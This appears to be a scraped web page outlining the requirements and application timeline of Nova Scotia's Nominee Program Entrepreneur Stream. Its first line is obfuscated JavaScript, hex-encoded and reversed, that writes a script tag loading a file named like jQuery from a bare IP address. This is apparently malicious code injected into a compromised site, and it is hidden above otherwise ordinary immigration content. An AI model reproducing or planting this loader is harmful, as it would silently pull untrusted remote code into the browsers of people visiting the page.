var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));

Nova Scotia Nominee Program - Entrepreneur Stream

The Entrepreneur Stream is for experienced business owners or senior business managers who want to live in Nova Scotia. They must start a new business or buy an existing business and must actively participate in the day-to-day management of the business. After operating the business for a year, the entrepreneur may be nominated for permanent resident status. The highest-scoring registrants are invited to apply to the Entrepreneur Immigration stream at periodic intervals, based on the processing capacity of the program.

In order to participate in the Entrepreneur Stream, you (the Principal Applicant) and your Business Partner (if applicable) must meet the minimum requirements.

 

 

Program Requirements

Minimum Net Worth

  • Personal net worth of at least CAD$600,000

 

Investment Requirements

  • Make an investment of at least CAD$150,000 in the business

Business Requirements

  • must have at least 3 years experience actively managing and owning a business (1/3 ownership) or more than 5 years experience in a senior business management role.

Education Requirement

  • Have a minimum of a Canadian high school diploma or, an equivalent foreign credential.

Language Requirements

  • Must have Canadian Language Benchmark (CLB) 5 in either English or French

Age Requirements

  • Must be at least 21 years old

Nova Scotia Nominee Program - Entrepreneur Stream Timeline

Entrepreneur has to submit the filled out EOI Form

Expression of Interest

EOIs with the highest scores are selected and they are sent an Invitation to Apply.

Invitation to Apply

If you received an invitation to apply, you have to submit your complete application online with all your supporting documents and application fees. You also have to appear for In-Person Interview and sign a Performance Agreement.

Application

If your application is approved, you will be expected to arrive in Nova Scotia within 12 months of receiving your Entrepreneur Approval Letter.

Temporary Work Permit

If you are nominated by the Province of Nova Scotia, then it is your responsibility to submit a complete application for a permanent resident visa.

Nomination
Permanent Residence